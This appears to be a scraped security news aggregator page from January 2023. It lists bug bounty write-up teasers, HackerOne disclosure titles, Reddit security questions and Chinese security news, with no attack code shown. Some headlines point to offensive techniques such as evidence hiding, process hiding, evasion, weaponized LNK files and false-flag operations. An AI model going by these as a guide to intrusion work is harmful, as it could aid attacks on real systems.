    CRLF-Carriage Return and Line Feed in Short | 2023
    Carriage Return and Line Feed In Short Bug Bounty | karthikeyan Nagaraj Continue reading on InfoSec Write-ups »
    The easiest way to get subdomain takeover
    بِسْمِ اللَّـهِ الرَّحْمَـٰنِ الرَّحِيم Continue reading on Medium »
    Disclosing Facebook page admins by playing a game
    Hello there, It’s been a long time since I wrote any article on my resolved reports due to some internal problems so today I’m going to… Continue reading on Medium »
    Securing your Infrastructure using Crowdsourced Security
    Bug Bounty hunting is a crowdsourced cyber security model that helps companies utilize the power of the crowd to secure their… Continue reading on Shahmeer Amir »
    Hide Evidences in Hacked System
    Introduction Continue reading on Medium »
    Ödül Avcılığı — 403 Forbidden Bypass
    Merhaba arkadaşlar , bu yazımızda 403 kısıtlamasını aşmak için ne tür teknikler uygulayabiliriz ? Ve 403bypass aracını kullanarak hızlı… Continue reading on Medium »
    XSS, Flash Cross-Domain Policy, and CSRF Vulnerabilities Discovered on a Single Website
    Hello everyone, my name is Koroush, (aka whiteOwl).  In this write-up, I will be discussing the methods I used to bypass the site’s input… Continue reading on Medium »
    bWAPP Mail Header Injection
    Mail Header Injection Nedir? Continue reading on Medium »
  • Open

    TryHackMe Red Team Fundamentals Writeup
    Task 1 Introduction Continue reading on Medium »
  • Open

    OSINT tool free to use
    OSINT tools for Cyber security Continue reading on Medium »
    What is OSINT and how do cyber security specialists perform OSINT on a person?
    OSINT, or Open-Source Intelligence, is the process of collecting, analyzing, and disseminating information from publicly available sources… Continue reading on Medium »
    OSINT Quiz Walkthrough — 23/01/2023
    Walkthrough about an OSINT Quiz challenge. Continue reading on Medium »
    Where does threat data come from?
    Understanding all the sources of threat data becomes intuitive if we can visualize cyberspace. Continue reading on Pagesweturned —  Curie »
    Where does threat data come from?
    Understanding all the sources of threat data becomes intuitive if we can visualize cyberspace. Continue reading on Medium »
  • Open

    SecWiki News 2023-01-28 Review
    成体系:大论文的另一关键环节 by ourren 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2023-01-28 Review
    成体系:大论文的另一关键环节 by ourren 更多最新文章,请访问SecWiki
  • Open

    有趣的Hack-A-Sat黑掉卫星挑战赛——卫星平台内存dump
    美国自2020年起,连续两年举办太空信息安全大赛“黑掉卫星(Hack-A-Sat)”,本文介绍了Hack-A-Sat黑掉卫星挑战赛的利用维护接口dump卫星平台内存这道赛题。
    Java代码审计项目--indedu因酷在线教育开源系统
    Java代码审计项目--indedu因酷在线教育开源系统,这个一个SSM架构的开源框架
    FreeBuf早报 | 俄罗斯科技巨头Yandex内部源码泄露;西非新的“杀猪”骗局
    俄罗斯最大的IT科技公司之一Yandex的源代码仓库据传遭到前员工窃取,相关数据已在某个流行黑客论坛上以BT种子形式泄露。
    Java堆栈溢出漏洞分析
    Java的数据类型在执行过程中存储在两种不同形式的内存中:栈(stack)和堆(deap),由运行Java虚拟机(JVM)的底层平台维护。
    PHP反序列化新手入门学习总结
    最近写了点反序列化的题,才疏学浅,希望对CTF新手有所帮助,有啥错误还请大师傅们批评指正。首先我们需要理解什么是序列化,序列化是将变量或对象转换成字符串的过程,用于存储或传递 PHP 的值的过程中
    乌克兰新闻机构遭俄军事黑客组织攻击
    乌克兰计算机应急响应小组在该国国家新闻机构的网络上发现了五种不同的数据擦除恶意软件组合
    Salamandra:一款功能强大的麦克风窃听检测工具
    Salamandra是一款功能强大的麦克风窃听检测工具,该工具可以帮助广大研究人员在封闭环境中检测和定位间谍麦克风工具。
    如何使用Vegile隐藏指定进程的运行
    Vegile是一款针对Linux系统设计和开发的强大后渗透测试工具,允许对目标可信网络执行更加深入的渗透测试与安全分析。
  • Open

    is bitwarden + yubikey 100% secure?
    Hello, It is time for me yo get a serious password manager... at the moment I'm using Google, but I feel I'm "playing with fire" lol After the lastpass saga, I now have doubts about the all concept.... I was thinking that bitwarden + yubikey seems to be the most secure option put there.... In theory, even in ma master password gets compromised , without my physical yubikey, nobody can access... correct? Or the lastpass issue would be anyhow pet password at risk also with yubikey? Mmmm I am a bit confused... submitted by /u/IP_FiNaR [link] [comments]

  • Open

    Analyzing javascript files(Part -2)
    Before reading the second part, go and read part 1 https://medium.com/@indhumathi19973/analyzing-javascript-files-part-1-9b07eb8cfb8e Continue reading on Medium »
    Automate your Bug Bounty with ChatGBT | 2023
    Use ChatGBT to Find Vulnerabilities and to Learn about Vulnerabilities | Karthikeyan Nagaraj Continue reading on InfoSec Write-ups »
    Bug Zero at a Glance [Week 21–27 January]
    What happened with Bug Zero? Continue reading on Bug Zero »
    Sensitive Data Exposure: Take Over All Environment
    Halo semuanya, kali ini saya mau menceritakan bagaimana saya bisa menemukan sebuah celah pada sebuah website salah satu website restoran… Continue reading on Medium »
    Discovered Reflected Cross-Site Scripting Vulnerable into Shaadi.com
    I have discovered a Reflected XSS vulnerability in shaadi.com, it means that an attacker can inject malicious code into the website, which… Continue reading on Medium »
    Is Bug Bounty Worth The Hype?
    This article discusses the pros and cons of bug bounty programs and how they can be useful for organizations. Continue reading on Medium »
    Why Every Bug Hunter Should Perfect Their Vulnerability Reports
    TL;DR- Today, we’ll take a look at some steps and examples of phenomenal bug hunting write-ups that are used to get even higher bounties. Continue reading on The Gray Area »
  • Open

    RESTler is a stateful REST API fuzzing tool
    Article URL: https://github.com/microsoft/restler-fuzzer Comments URL: https://news.ycombinator.com/item?id=34552574 Points: 6 # Comments: 0
    Findings from HashiCorp's Vault API fuzzing (1)
    Article URL: https://ludovicianul.github.io/2023/01/26/vault-api-fuzz-part1/ Comments URL: https://news.ycombinator.com/item?id=34545710 Points: 3 # Comments: 0
    Critical RCE Vulnerabilities Found in Git – Fuzzing Weekly CW4
    Article URL: https://ioc.exchange/@FuzzingWeekly/109760561292096797 Comments URL: https://news.ycombinator.com/item?id=34544360 Points: 1 # Comments: 0
  • Open

    How do fido u2f security keys work?
    I'm trying to understand how these physical keys work. So far I found: https://www.fastmail.com/blog/how-u2f-security-keys-work/ If i simply open up a text editor, plug in the key and press the button I get a random 6 digit number, is that the nonce? I assume the same process happens if I use USB or NFC? How are those random numbers generated? True randomness is hard. Is the secret key unique to every devise a manufacturer creates? If I buy a key from a shady guy on the corner and he just cloned every key to save money so that every key has the same secret key and generates the same random numbers then any key can access any account? Is that a realistic scenario with so many devices made by the lowest bidder in China? Alternatively the random number generator and the private key generator the factory uses can be flawed in which case the auth can be brute forced? Thanks. submitted by /u/lmow [link] [comments]
    could bitwarden have same issue as LastPas
    As the LastPass saga is cooling off, I ender if other password managers (e.g bitwarden) could have same issue... or maybe the master password is only stored in each one machine/phone.. Ideas? Thank you submitted by /u/IP_FiNaR [link] [comments]
    Do you need to backup these things?
    IT student here, but just curious are you supposed to backup your domain controller? For your active directory? It seems like that would be a smart thing to do. Also, when it comes to Saas applications do most organizations just rely on the vendor for data backups or do most organizations have their own method to backup a cloud/Saas applications data? submitted by /u/SmarterTogether [link] [comments]
    Understanding SSH with public keys
    I'm learning about ssh-keygen and how to generate the public keys. Daily, when I connect to a remote ip I use ssh. Just in the case about github or gitlab I used the steps to generate a pair of keys and sending it to the remote server. I didn't stop to understand how it works and not even if this is the more secure way to connect. So, making a pair of key in RSA or ed25510, coping to the ip and using the pass phase it's more secure than regular credentials? What are the cons about logging this way? Someone getting the key somehow? getting my pass phrase? Explaining would be very welcome :) submitted by /u/MrNoodlesLearns [link] [comments]
    bitlocker - two questions
    I have 1 hard drive with 2 partitions, will bitlocker encrypt both? Do I encrypt only used space or all? If only used, what happens to the unused, does it get encrypted as space is written to it? submitted by /u/foxtrot90210 [link] [comments]
  • Open

    Updates, Compilation
    Thoughts on Detection Engineering I read something online recently that suggested that the role of detection engineering is to reduce the false positive (FPs) alerts sent to the SOC. In part, I fully agree with this; however, "cyber security" is a team sport, and it's really incumbent upon SOC and DFIR analysts to support the detection engineering effort through their investigations. This is something I addressed a bit ago in this blog, first here, and then here.  From the second blog post linked above, the most important value-add is the image to the right. This is something I put together to illustrate what, IMHO, should be the interaction between the SOC, DFIR, threat hunting, threat intel, and detection engineering. As you see from the image, the idea is that the output of DFIR work,…
  • Open

    [U.S. Air Force] Information disclosure due unauthenticated access to APIs and system browser functions
    U.S. Dept Of Defense disclosed a bug submitted by theinternetofdefcon_: https://hackerone.com/reports/1822160
    Reflected XSS on .mil
    U.S. Dept Of Defense disclosed a bug submitted by alishah: https://hackerone.com/reports/1799562
    reflected xss in www..gov
    U.S. Dept Of Defense disclosed a bug submitted by maskedpersian: https://hackerone.com/reports/1814335
    XSS on ( .gov ) Via URL path
    U.S. Dept Of Defense disclosed a bug submitted by notajax: https://hackerone.com/reports/1825942
    IDOR for changing privacy settings on any memories
    TikTok disclosed a bug submitted by mrhavit: https://hackerone.com/reports/1733627 - Bounty: $5500
    XSS at TikTok Ads Endpoint
    TikTok disclosed a bug submitted by s3c: https://hackerone.com/reports/1683129 - Bounty: $5000
    Verification process done using different documents without corresponding to user information / User information can be changed after verification
    EXNESS disclosed a bug submitted by siddharthamx: https://hackerone.com/reports/1446107 - Bounty: $500
    wavecell.com: Broken Link Hijacking / Instagram Takeover @
    8x8 disclosed a bug submitted by xdopa: https://hackerone.com/reports/1826892
    Any user can vote on `Friend Only` video pull
    TikTok disclosed a bug submitted by mrhavit: https://hackerone.com/reports/1793940 - Bounty: $500
  • Open

    This paper reinforces the belief that RSA isn't going to fall to Shor's Algorithm anytime soon
    submitted by /u/atoponce [link] [comments]
    Justice Dept. Dismantles a Major Ransomware Operation
    submitted by /u/dlorenc [link] [comments]
    Factorization (DCQF) of a 48-bit integer using 10 trapped-ion qubits
    submitted by /u/c0r0n3r [link] [comments]
    Kamailio's exec module considered harmful – RTC security
    submitted by /u/EnableSecurity [link] [comments]
    Pre-Auth RCE on OpenEMR: Using a rogue MySQL server to steal your health data
    submitted by /u/SonarPaul [link] [comments]
    Fun with Gentoo: Why don't we just shuffle those ROP gadgets away?
    submitted by /u/Gallus [link] [comments]
  • Open

    SecWiki News 2023-01-27 Review
    今日暂未更新资讯~ 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2023-01-27 Review
    今日暂未更新资讯~ 更多最新文章,请访问SecWiki
  • Open

    Derek and Clive, Monty Python, National Lampoon, The Comic Strip, Some Music, SFX... I think this is an index of Vinyl Records converted to MP3
    Main index is here https://www.footnoteconspiracy.com/ The comedy (radio?) shows and mp3 conversions, are in /datadump/ so that's a good place to start. submitted by /u/little_maggot [link] [comments]
  • Open

    Burp Suite roadmap update: January 2023
    Believe it or not, it's January once again. And this can mean only one thing - it's time to update you on the changes we've got in store for Burp Suite over the next six months.     But this
    Packetlabs Ltd delivers advanced testing capabilities with Burp Suite Certified Practitioners
    We launched the Burp Suite Certified Practitioner (BSCP) certification at the end of 2021 due to growing demand from Burp Suite Professional customers. Spanning everything from classic vulnerability c
  • Open

    Burp Suite roadmap update: January 2023
    Believe it or not, it's January once again. And this can mean only one thing - it's time to update you on the changes we've got in store for Burp Suite over the next six months.     But this
    Packetlabs Ltd delivers advanced testing capabilities with Burp Suite Certified Practitioners
    We launched the Burp Suite Certified Practitioner (BSCP) certification at the end of 2021 due to growing demand from Burp Suite Professional customers. Spanning everything from classic vulnerability c
  • Open

    DeepHunter Fuzzes Deep Neural Networks (DNN)
    Researchers built a coverage guided fuzzer, DeepHunter, for protecting DNN’s against malicious attacks. Continue reading on Medium »
    Critical RCE Vulnerabilities Found in git — Fuzzing Weekly CW4
    Critical RCE Vulnerabilities Found in git (CVE-2022–4190, CVE-2022–23251)… Continue reading on Medium »
  • Open

    DeepHunter Fuzzes Deep Neural Networks (DNN)
    Researchers built a coverage guided fuzzer, DeepHunter, for protecting DNN’s against malicious attacks. Continue reading on Medium »
    Critical RCE Vulnerabilities Found in git — Fuzzing Weekly CW4
    Critical RCE Vulnerabilities Found in git (CVE-2022–4190, CVE-2022–23251)… Continue reading on Medium »
  • Open

    Mitigating RBAC-Based Privilege Escalation in Popular Kubernetes Platforms
    We recap our research on privilege escalation and powerful permissions in Kubernetes and analyze the ways various platforms have addressed it. The post Mitigating RBAC-Based Privilege Escalation in Popular Kubernetes Platforms appeared first on Unit 42.
  • Open

    Forensics tools - Apple Mx Pro
    Hello everyone. I'm looking to buy a MacBook Pro with M1/M2 Pro architecture and was wondering if any of you have any experience running x86 executables within a Windows ARM VM. I first assumed it was impossible to run x86s (since Rosetta only works within Linux ARM VMs), but I've subsequently heard that it is now doable. Have any of you had the chance to try? If so, how is your performance? submitted by /u/samaritan_o [link] [comments]
    Need link to Magnet Acquire direct download.
    I've submitted the form on their website through my work. I've even spoken with a sales person, but I'm on day 3 now without a download link. submitted by /u/Scrant0nStr4ngler [link] [comments]
  • Open

    Analyze CVE Exposures – Threat Detection in Cybersecurity with Memgraph
    Article URL: https://memgraph.com/blog/efficient-threat-detection-in-cybersecurity-with-memgraph Comments URL: https://news.ycombinator.com/item?id=34544326 Points: 2 # Comments: 0
    CVE-2023-23504: XNU Heap Underwrite in dlil.c
    Article URL: https://adamdoupe.com/blog/2023/01/23/cve-2023-23504-xnu-heap-underwrite-in-dlil-dot-c/ Comments URL: https://news.ycombinator.com/item?id=34542007 Points: 1 # Comments: 0
  • Open

    Gaza Surveillance
    يظهر تشريح فيديو وزارة الدفاع قيام مصر بمراقبة الشريط الحدودي مع غزة بما يزيد عن ١٢٠ كاميرا مراقبة منتشرة من البحر الي معبر كرم ابوسالم Continue reading on Medium »
    Telegram OSINT
    This is just an introduction, follow for the up comming series on hacking . Continue reading on Medium »
  • Open

    U.S. Department of Justice Disrupts Hive Ransomware Variant
    submitted by /u/dmchell [link] [comments]
    DragonSpark | Attacks Evade Detection with SparkRAT and Golang Source Code Interpretation
    submitted by /u/dmchell [link] [comments]
  • Open

    Easy XSSHunter Discord Alerts
    This will be a setup guide for XSSHunter and integrating it with Discord Continue reading on InfoSec Write-ups »
    MX Takeovers Automated | Subdomain Takeover
    Using MX-Takeover is a Go tool that automatically takes over email subdomains services when they become available Continue reading on InfoSec Write-ups »
    Biggest Cybersecurity Threats in 2023
    Stay informed and protect yourself and your organization against Ransomware, Phishing, Advanced persistent threats, IoT threats, Cloud… Continue reading on InfoSec Write-ups »
    Data Science meets Cyber Security
    No content preview
    You got Domain Admin, now what?
    No content preview
    3 practical steps to learn AWS security in 2023
    Follow these steps to get from a beginner to a pro in AWS security Continue reading on InfoSec Write-ups »
    Easy XSSHunter Express Setup Script
    With xsshunter.com shutting down setting up your own xsshunter will be more important. This script will make it a lot easier Continue reading on InfoSec Write-ups »
  • Open

    Easy XSSHunter Discord Alerts
    This will be a setup guide for XSSHunter and integrating it with Discord Continue reading on InfoSec Write-ups »
    MX Takeovers Automated | Subdomain Takeover
    Using MX-Takeover is a Go tool that automatically takes over email subdomains services when they become available Continue reading on InfoSec Write-ups »
    Biggest Cybersecurity Threats in 2023
    Stay informed and protect yourself and your organization against Ransomware, Phishing, Advanced persistent threats, IoT threats, Cloud… Continue reading on InfoSec Write-ups »
    Data Science meets Cyber Security
    No content preview
    You got Domain Admin, now what?
    No content preview
    3 practical steps to learn AWS security in 2023
    Follow these steps to get from a beginner to a pro in AWS security Continue reading on InfoSec Write-ups »
    Easy XSSHunter Express Setup Script
    With xsshunter.com shutting down setting up your own xsshunter will be more important. This script will make it a lot easier Continue reading on InfoSec Write-ups »
  • Open

    Easy XSSHunter Discord Alerts
    This will be a setup guide for XSSHunter and integrating it with Discord Continue reading on InfoSec Write-ups »
    MX Takeovers Automated | Subdomain Takeover
    Using MX-Takeover is a Go tool that automatically takes over email subdomains services when they become available Continue reading on InfoSec Write-ups »
    Biggest Cybersecurity Threats in 2023
    Stay informed and protect yourself and your organization against Ransomware, Phishing, Advanced persistent threats, IoT threats, Cloud… Continue reading on InfoSec Write-ups »
    Data Science meets Cyber Security
    No content preview
    You got Domain Admin, now what?
    No content preview
    3 practical steps to learn AWS security in 2023
    Follow these steps to get from a beginner to a pro in AWS security Continue reading on InfoSec Write-ups »
    Easy XSSHunter Express Setup Script
    With xsshunter.com shutting down setting up your own xsshunter will be more important. This script will make it a lot easier Continue reading on InfoSec Write-ups »
  • Open

    LOL源代码被盗,暗网100万拍卖
    拳头公司承认遭遇了黑客攻击,英雄联盟、云顶之弈以及反作弊平台的源代码被盗。

  • Open

    L’oeil de Palantir au dessus de l’Ukraine
    Le géant de l’intelligence du Big data a officiellement annoncé soutenir l’armée ukrainienne. Analyse pointue du territoire et captation… Continue reading on Medium »
    Unleash the Power of AMASS: Discover Hidden Subdomains and Assets with this Must-Have Security Tool
    How to Use the Security Tool AMASS Continue reading on Medium »
    Unleash the Power of AMASS: Discover Hidden Subdomains and Assets with this Must-Have Security Tool…
    AMASS (Attack Surface Mapping and Asset Discovery) is a security tool that can be used to discover subdomains and assets associated with a… Continue reading on Medium »
  • Open

    Finding Truth in the Shadows
    submitted by /u/dmchell [link] [comments]
    Vice Society Ransomware Group Targets M
    submitted by /u/dmchell [link] [comments]
  • Open

    Security Onion issue with Kibana "application not found"
    Have searched for an answer and looked at the SO docs and cant find the answer to this problem. Getting logs into SO just fine and can see "all logs" count going up. Issue is when I click on any data that has a blue hyperlink instead of Kibana drilling down I get a new browser window with a message saying "application not found". Can anybody point me to documentation as to how I fix this? submitted by /u/Sho_nuff_ [link] [comments]
    tlsv1 decrypt error with mitmproxy
    Hello, I'm trying to see what data do apps send and receive from their servers using mitmproxy. For a long time, I had no problems decrypting HTTPS with the certificate installed, but since December, I get "Client TLS handshake failed" errors, both when I'm routing curl through proxy on my host machine and when I'm routing Android through the proxy. It happens when I use mitmproxy from my packge manager, Linux binary from mitmproxy's website, building it from git and using it through Docker, both when using my user and different user account. However, when using mitmproxy on a virtual machine with the same operating system (Arch Linux), I get no errors. It only happens in HTTP proxy mode, not in SOCKS5 mode. On mitmproxy's bugtracker I got redirected to discussions section and got ignored. Command with which I start mitmproxy: mitmdump --verbose curl command: curl -x http://127.0.0.1:8080 https://google.com mitmproxy output: ``` [19:47:26.419] HTTP(S) proxy listening at *:8080. [19:47:27.456][127.0.0.1:42784] client connect [19:47:27.476][127.0.0.1:42784] server connect google.com:443 (142.250.203.142:443) [19:47:27.588][127.0.0.1:42784] Client TLS handshake failed. The client may not trust the proxy's certificate for google.com (OpenSSL Error([('SSL routines', '', 'tlsv1 alert decrypt error')])) [19:47:27.589][127.0.0.1:42784] client disconnect [19:47:27.589][127.0.0.1:42784] closing transports... [19:47:27.589][127.0.0.1:42784] server disconnect google.com:443 (142.250.203.142:443) [19:47:27.590][127.0.0.1:42784] transports closed! ``` curl output: curl: (35) OpenSSL/3.0.7: error:0200008A:rsa routines::invalid padding mitmproxy --version output: ``` Mitmproxy: 9.0.1 Python: 3.10.9 OpenSSL: OpenSSL 3.0.7 1 Nov 2022 Platform: Linux-6.1.8-arch1-1-x86_64-with-glibc2.36 ``` submitted by /u/greenhaveproblemexe [link] [comments]
    UTMStack VS Wazuh VS Security Onion
    Hi there, I currently study these products. Has anyone worked with them? What are the main differences (except GUI)? They all as I see based on ELK stack. I had never heard of UTMstack and had little information about it. submitted by /u/athanielx [link] [comments]
    Learn Cybersecurity along with webDev
    I'm currently learning web development and was interested in exploring the networking and security aspect of it too. Was wondering if I could do so and if yes, which resources would you recommend? submitted by /u/god_of_hypocrites17 [link] [comments]
    My ASUS Falchion keyboard has two keyboards and a mouse in it - malicious?
    I've been experiencing a fair bit of cyber attacks, and I am wondering if my ASUS ROG Falchion keyboard might have been spiked a bit - when I plug it in on Windows is see 2 new keyboards and 1 new mouse show up. Before plugging in: https://imgur.com/a/1lyRZpP After plugging in: https://imgur.com/a/lapQSpy On Linux, using "tail -f /var/log/kern.log /var/log/syslog" I get this output: ==> /var/log/syslog /var/log/kern.log /var/log/syslog <== Jan 26 02:25:11 pop-os kernel: [16688.704200] usb 3-1: New USB device found, idVendor=0b05, idProduct=193c, bcdDevice= 3.16 J…
  • Open

    Program for viewing .vcf
    Does anyone have any suggestions for a cheap or free program to view .vcf or if it's included in an existing forensic suite and I'm just missing it? submitted by /u/dgree049 [link] [comments]
  • Open

    Exploiting a Critical Spoofing Vulnerability in Windows CryptoAPI
    Article URL: https://www.akamai.com/blog/security-research/exploiting-critical-spoofing-vulnerability-microsoft-cryptoapi Comments URL: https://news.ycombinator.com/item?id=34536361 Points: 1 # Comments: 0
    Realtek SDK Vulnerability Attacks Highlight IoT Supply Chain Threats
    Article URL: https://unit42.paloaltonetworks.com/realtek-sdk-vulnerability/ Comments URL: https://news.ycombinator.com/item?id=34531380 Points: 2 # Comments: 0
    Exploiting a Critical Spoofing Vulnerability in Windows CryptoAPI
    Article URL: https://www.akamai.com/blog/security-research/exploiting-critical-spoofing-vulnerability-microsoft-cryptoapi Comments URL: https://news.ycombinator.com/item?id=34529259 Points: 1 # Comments: 0
  • Open

    How I Found My First Bug in Android
    Bypass the Password and Biometrics Functionalities Continue reading on Medium »
    What is website Bug ?
    A website bug is an error or malfunction that occurs on a website, which can cause it to behave in unexpected ways or prevent it from… Continue reading on Medium »
    XSS vulnerability
    Hii amigos today we are going to discuss about XSS vulnerability listed also known as Cross-site-Scripting vulnerability which is regarded… Continue reading on Medium »
    How to Use : Nmap for ports and Network scanning?
    Network and Port scanning is like going around a house and observing which doors and windows are open and who is standing on them. Continue reading on Medium »
    P1 Bug Hunting — FTP Server Broken Access Control
    TL;DR- A bug hunting walkthrough on a critical-level FTP vulnerability that was alarmingly simple to find and validate. Continue reading on The Gray Area »
  • Open

    Getting into evasion
    I want to shift more towards evasion. I’m lowkey familiar with the theory around unhooking, direct/indirect system calls etc, but don’t know which technique to focus on to get started. From what I understand direct system calls are not relevant anymore on newer versions of windows and for unhooking, the calls needed to unhook might be hooked? Some enlightment here would be amazing thanks! submitted by /u/MickeyDB01 [link] [comments]
  • Open

    SecWiki News 2023-01-26 Review
    记一次Webshell检测引擎绕过测试 by ourren 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2023-01-26 Review
    记一次Webshell检测引擎绕过测试 by ourren 更多最新文章,请访问SecWiki
  • Open

    FreeBuf早报 | 日本多个中央部门电邮地址遭泄露;Hive 勒索软件被查
    由美国司法部、联邦调查局、特勤局、欧洲刑警组织以及德国 BKA 和 Polizei组成的国际执法行动,将Hive 勒索软件数据泄露站点查获。
  • Open

    Advisory: XXS Vulnerability for Arbitrary Domains in Skyhigh Security's Secure Web Gateway
    submitted by /u/RedTeamPentesting [link] [comments]
    Yandex Services Source Code Leaked
    submitted by /u/pipewire [link] [comments]
    Exploiting a Critical Spoofing Vulnerability in Windows CryptoAPI
    submitted by /u/Gallus [link] [comments]
    Ransacking your password reset tokens
    submitted by /u/mckirk_ [link] [comments]
    Digital False Flag Operations: A How-To Guide. Pinning your malicious digital operations to the opposition
    submitted by /u/Robbedoes_ [link] [comments]
    Whacking a phishing admin panel for fun and profit
    submitted by /u/thehunter699 [link] [comments]
  • Open

    Github Apps can use Scoped-User-To-Server Tokens to Obtain Full Access to User's Projects in Project V2 GraphQL api
    GitHub disclosed a bug submitted by ahacker1: https://hackerone.com/reports/1711938 - Bounty: $20000
  • Open

    Chinese PlugX Malware Hidden in Your USB Devices?
    PlugX remains an active threat. A newly discovered variant infects USB devices and a similar variant makes copies of PDF and Microsoft Word files. The post Chinese PlugX Malware Hidden in Your USB Devices? appeared first on Unit 42.
  • Open

    As cores dos times e seus significados: RED TEAM
    tarponise Continue reading on Medium »
    Weaponizing LNK files with CMD
    One of the main problems with Red Team engagements is gaining initial access to the target organisation if no exploitable vulnerabilities… Continue reading on Medium »
    Tryhackme — Gallery
    Hi semua sudah lama tidak update tulisan pada blog ini. Maka pada tulisan kali ini saya akan membagikan writeup dari mechine tryhackme… Continue reading on Medium »
  • Open

    Some random installs and backups
    http://193.93.60.30/ submitted by /u/deadjdona [link] [comments]

  • Open

    Microsoft Defender Best Security Policies & Practices To Adopt?
    Hi In my current company we use conditional access policies for AD Was wondering what some Microsoft Defender for Cloud Apps, Microsoft Security and Microsoft AD functions, policies and practices are to adopt. Like what do you your company currently utilise? We are a Microsoft house and I am always very keen to get my hands dirty and implement new countermeasures Thanks again submitted by /u/moneyzaa [link] [comments]
    SANS Aptitude Test
    Hello! Does anybody have any info about the aptitude test, types of questions, score needed to pass.. etc submitted by /u/Bojangles_BBN [link] [comments]
    Unusual traffic times, encrypted over port 80 to VPS
    We've found an Android device in our guest wireless zone that's regularly connecting over port 80 to a VPS in Canada (I'm in USA) early in the morning or very late at night. So far I haven't been able to correlate it to a custodian based on entrance times. The data transmitted is usually less than 20k, though occassionally a larger chunk between 500-600k. I'm not terribly concerned about it since that network is tightly isolated, but it looks like something beaconing out and I'm very curious to get to the bottom before I just outright block it. I only have a few packets to analyze and I can't see much since the data is scrambled. submitted by /u/EnterNam0 [link] [comments]
    How to properly identify attacker (RAT, Uefi Rootkit, Hidden IoT Device, Rubberducky) and Log / track it
    A Client of Mine ist infected with some Kind of remote Access/control vnc Software. Probably a RAT for Windows 10. Firewalls and Antivirus Software does Not find anything. Manually checking Autostarts, Sheduler, Services and so in didnt Bring up any suspicious process. (Iam not a Infosec Professional, Just an Administrator). So this Guy actually Made fun of me and chatted with me inside a Text File and disrupts my and the employes Work by clicking and opening Programm, installing Games and doing a Lot of HOAX. I tried to capture Open Ports and IP Adresses via Netstat, but of course everytime i so some Research, he Just closes my remote Support Application. Iam Not Sure If forensics could find anything when i unplug this Computer from the Internet. Probably there are some Automatic cleanup / rename tasks. What would be the poper way to react?. We closed all outgoing Ports of the Firewall and whitelisted the Essential Ports. Problem Port: 443.how can secure HTTPS? I found an old OpenSSH Installation and iam Not Sure If the attacker encrypts His RAT/VNC/SSH actions via Putty (for example) and hides its Traffic in HTTPS Traffic. Geoblocking is active. Still useless If He is behind a vpn or proxie casquade. Making Things more complicated, he shared some information within our Chat which indicate (prove) that He or she is an employes in the Same company. He even explained why He is Manipulation this exact Workstation and co-workers. Best regards Civil submitted by /u/IndependenceCivil175 [link] [comments]
    educating customers on phishing
    At our company we're looking at adding and sharing information, including images, of what our official communications looks like so they can spot real letter/emails/texts from us from fake ones. Similar to these companies https://www.royalmail.com/help/scam-examples https://www.britishgas.co.uk/help-and-support/my-account/if-you-get-a-suspicious-email Anyone got experience of this in their company or want to share advice on what to avoid or recommendations so we help our customers without helping criminals! A fine line to balance! submitted by /u/TWateride [link] [comments]
    Scripts for Blind SQLi? (for OSCP)
    Hello, folks! I am preparing for the OSCP, currently going through TjNull's List. Today I was solving Healthcare-1 from Vulnhub. It has OpenEMR v4.1.0 (sry for the spoiler) which has SQLi exploit. https://www.exploit-db.com/exploits/49742I have 3 options: SQLMAP (not allowed in the exam) Do it manually (ahh, Blind SQLi will take forever) Use available scripts as mentioned above. My Question : Can we use these kind of scripts on the exam? PS: Asking this here cause I could not post on r/OSCP (It shows post is removed;my karma is low) and don't know where should I ask this. Yeah I'm new to reddit. submitted by /u/doubleo10 [link] [comments]
  • Open

    Unrestricted File Upload
    Bypass Filter: Continue reading on Medium »
    Dexalot HackenProof Bug Bounty
    Dexalot ek non-custodial, decentralized cryptocurrency exchange hai jisme ek Central Limit Order Book capability hai. Avalanche dwara… Continue reading on Dexalot »
    0xbaDc0dE MEV Bot Hack Analysis
    Introduction Continue reading on Immunefi »
    Exploração de CVE-2022–21500
    Olá pessoas, esse é o meu primeiro artigo aqui no medium. Nesse primeiro artigo, vou contar como eu consegui encontrar e explorar a… Continue reading on Medium »
    Top 10 bugs found in C++ projects in 2022
    According to tradition, it’s time to recall 10 of the most interesting warnings that PVS-Studio found during 2022. Continue reading on PVS-Studio »
    Easy 2000$ Race Condition
    In this post, I will show you how Race Condition can be critical. Continue reading on Medium »
    Story of Stored HTML Injection
    Whoami: Althaf Continue reading on Medium »
    Learning Web-Sec - Day 14 - Authentication Vulnerabilities
    Multiple Credentials Per Request - PortSwigger Lab Walkthrough Continue reading on System Weakness »
    How Black Hat Hackers Hacks Anyone With Just SMS
    Beware of these kinds of messages. Of course, it won’t affect iPhone users. But, I tried checking out the link, It basically downloads an… Continue reading on Medium »
  • Open

    Geolocating Protesters In Yemen
    TOPICS Continue reading on The Sleuth Sheet »
  • Open

    PyCript is a Burp Suite extension to bypass client-side encryption that supports both manual and automated testing such as Scanners, Intruder, or SQLMAP. Custom encryption logic can be written in NodeJS to support any encryption within BurpSuite
    submitted by /u/Ano_F [link] [comments]
    DMARC Identifier Alignment: relax, don't do it, when you want to go to it - From subdomain takeover to phishing mails
    submitted by /u/ljulolsen [link] [comments]
    Active Directory: Using LDAP Queries for Stealthy Enumeration
    submitted by /u/andreashappe [link] [comments]
    Exploiting Hardcoded Keys to achieve RCE in Yellowfin BI
    submitted by /u/Mempodipper [link] [comments]
  • Open

    SecWiki News 2023-01-25 Review
    Fiora:漏洞PoC框架Nuclei的图形版 by 路人甲 各种架构ELF后门生成工具 by 路人甲 DARPA的可解释人工智能程序 by ourren 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2023-01-25 Review
    Fiora:漏洞PoC框架Nuclei的图形版 by 路人甲 各种架构ELF后门生成工具 by 路人甲 DARPA的可解释人工智能程序 by ourren 更多最新文章,请访问SecWiki
  • Open

    手上有啥就搞啥(四) H3C 智能摄像头
    本篇是”手上有啥就搞啥“系列的第四篇,研究对象是H3C TC2100 智能摄像头(云台),侧重点是流量截取和协议分析。
  • Open

    At the Edge of Tier Zero: The Curious Case of the RODC
    Continue reading on Posts By SpecterOps Team Members »
    Attacking DevOps ecosystems with Epyon
    Epyon is a swiss army knife tool for pentesting DevOps ecosystems. It has multiple modules for performing actions in common DevOps systems. Continue reading on Morphus Labs »
    DLL Sideloading. Una perspectiva ofensiva.
    Primera Parte. Continue reading on Red Squadron »
    5 Best C2 Framework for Red Teaming
